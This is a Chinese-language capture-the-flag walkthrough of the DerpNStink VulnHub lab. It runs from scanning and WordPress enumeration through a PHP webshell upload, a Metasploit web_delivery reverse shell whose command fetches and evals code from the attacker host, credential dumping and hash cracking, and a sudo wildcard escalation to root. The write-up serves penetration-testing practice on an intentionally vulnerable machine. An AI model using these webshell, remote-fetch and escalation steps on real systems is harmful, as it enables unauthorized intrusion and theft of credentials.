简介
虚拟机下载: https://www.vulnhub.com/entry/derpnstink-1,221/
靶机: 使用Virtualbox虚拟机导入OVA
攻击机:kali linux
0x001 信息收集
nmap扫描网络找到VM ip地址
nmap -sn 192.168.1.100-254
Nmap scan report for 192.168.1.105
Host is up (0.043s latency).
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
0x002 TCP UDP端口扫描
tcp
nmap -n -A -p- 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 16:57 CST
Nmap scan report for 192.168.1.105
Host is up (0.0067s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
udp
nmap -n -A -sU 192.168.1.105
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-15 17:09 CST
Nmap scan report for 192.168.1.105
Host is up (0.0055s latency).
Not shown: 954 closed ports, 45 open|filtered ports
PORT STATE SERVICE VERSION
5353/udp open mdns DNS-based service discovery
| dns-service-discovery:
| 9/tcp workstation
|_ Address=192.168.1.105 fe80:0:0:0:a00:27ff:fe2d:1b31
MAC Address: E0:94:67:A1:C9:FD (Intel Corporate)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
0x003 侦查
HTTP 在112行 找到了flag1
<!--http://192.168.1.105/-->
<div>
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
</div>
FTP 需要用户名和密码 不允许匿名访问
nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER root
530 Permission denied.
nc 192.168.1.105 21
220 (vsFTPd 3.0.2)
USER stinky
331 Please specify the password.
ssh 需要密钥
ssh root@192.168.1.105
root@192.168.1.105: Permission denied (publickey).
0x004 web目录爬取
Burp Spider 找到二个有趣的URL
http://192.168.1.105/webnotes/
http://192.168.1.105/webnotes/info.txt
dirb
dirb http://192.168.1.105/ -o dirb.log
...内容太多省略...
提取URL
cat dirb.log | grep "CODE:200" | cut -d" " -f2 > dirburls.txt
cat dirb.log | grep "==> DIRECTORY:" | cut -d" " -f3 >> dirburls.txt
Eyewitness抓取URL
eyewitness --web -f /root/dirburls.txt
.........
.........
[*] Done! Report written in the /usr/share/eyewitness/01152019_184614 folder!
Would you like to open the report now? [Y/n] Y
打开文件将发现两个比较有趣的URL
http://192.168.1.105/php/phpmyadmin/ #用户信息 将之关注第二个URL
http://192.168.1.105/weblog/
添加域到host文件 重定向到http://derpnstink.local/weblog/
echo "192.168.1.105 derpnstink.local" >> /etc/hosts
再次访问博客
http://derpnstink.local/weblog/
查看源码将发现如下URL 并不能执行cmd
<li>
<h3 style="opacity:70;">Slideshow</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/derp.png</span>
<p></p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">h0m3l4b1t</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php</span>
<p>h0m3l4b1t</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">h0m3l4b1t</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php</span>
<p>h0m3l4b1t</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">randonx</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/elidumfy.php</span>
<p>randonx</p>
<a></a>
</li>
<li>
<h3 style="opacity:70;">randonx</h3>
<span>http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/uoukbgmr.php</span>
<p>randonx</p>
<a></a>
</li>
</ul>
0x005 CMS识别
从网页最下方发现CMS是WordPress站点 接下来利用wpscan
wpscan --url http://192.168.1.105/weblog
访问博客管理页面 尝试若口令 username:admin password:admin 可以登录
0x006 get webshell
通过上传图片 上传webshell
cat webshell.php
<?php
system($_GET["cmd"]);
?>
访问执行cmd
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20ls
Meterpreter shell
msf > use multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set TARGET 1
TARGET => 1
msf exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(multi/script/web_delivery) > set srvport 8989
srvport => 8989
msf exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.103:4444
msf exploit(multi/script/web_delivery) > [*] Using URL: http://0.0.0.0:8989/XFHqfm2xqfO
[*] Local IP: http://192.168.1.103:8989/XFHqfm2xqfO
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.1.103:8989/XFHqfm2xqfO'));"
URL执行cmd
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/webshell.php?cmd=%20php%20-d%20allow_url_fopen=true%20-r%20%22eval(file_get_contents(%27http://192.168.1.103:8989/XFHqfm2xqfO%27));%22
发现权限特别的低
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > pwd
/var/www/html/weblog/wp-content/uploads/slideshow-gallery
meterpreter > shell
Process 2091 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
exit
meterpreter > cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
alse
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
wordpress数据库的配置
cat /var/www/html/weblog/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'mysql');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
0x007 root权限
使用之前找到的数据库 用户root 密码mysql 登录 http://192.168.1.105/php/phpmyadmin/
在wp_user表中 找到用户的哈希密码 在mysql user表中找到用户哈希密码
unclesticky 密码是经过加盐 使用知道的admin哈希密码进行替换 $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
MySQL哈希 * 9B776AFB479B31E8047026F1185E952DD1E530CB对应的密码为wedgie57 URL哈希查询https://crackstation.net/
0x008 获取flag2
unclestinky admin 登录
http://derpnstink.local/weblog/wp-login.php
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
0x009 访问FTP
ftp://192.168.1.105 用户stinky 和 mysql密码相同 wedgie57
得到了密钥ftp://192.168.1.105/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
0x010 flag3
修改本地密钥文件连接
chmod 700 ~/.ssh/id_rsa
/。。。。。
stinky@DeRPnStiNK:~$ cat Desktop/flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
包含mrderp的Wordpress凭据的pcap文件
stinky@DeRPnStiNK:~$ ls Documents/
derpissues.pcap
使用Wireshark读取derpissues.pcap
mrderp的密码:derpderpderpderpderpderpderp
换到mrderp用户
stinky@DeRPnStiNK:~$ su mrderp
Password:
mrderp@DeRPnStiNK:/home/stinky$
mrderp@DeRPnStiNK:~$ cat Desktop/helpdesk.log
Thank you for contacting the Help Desk. Your ticket information and its resolution is
below.
0x011 root flag4
mrderp@DeRPnStiNK:~$ sudo su
[sudo] password for mrderp:
Sorry, user mrderp is not allowed to execute '/bin/su' as root on DeRPnStiNK.
mrderp@DeRPnStiNK:~$
mrderp不允许运行/bin/su
用sudo
mrderp@DeRPnStiNK:~$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~$
创建名为名为derpy.sh的脚本
mrderp@DeRPnStiNK:~$ cd /home/mrderp/
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ echo "/bin/bash" > binaries/derpy.sh
mrderp@DeRPnStiNK:~$ chmod +x binaries/derpy.sh
mrderp@DeRPnStiNK:~$ sudo ./binaries/derpy.sh
root@DeRPnStiNK:~# id
uid=0(root) gid=0(root) groups=0(root)
root@DeRPnStiNK:~# cat /root/
.bash_history .compiz/ Desktop/ Downloads/ .ICEauthority .mysql_history .Xauthority
.bashrc .config/ .dmrc .gconf/ .local/ .profile .xsession-errors
.cache/ .dbus/ Documents/ .gvfs/ .mozilla/ .ssh/ .xsession-errors.old
root@DeRPnStiNK:~# cat /root/Desktop/flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) #拿到了flag4
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
root@DeRPnStiNK:~#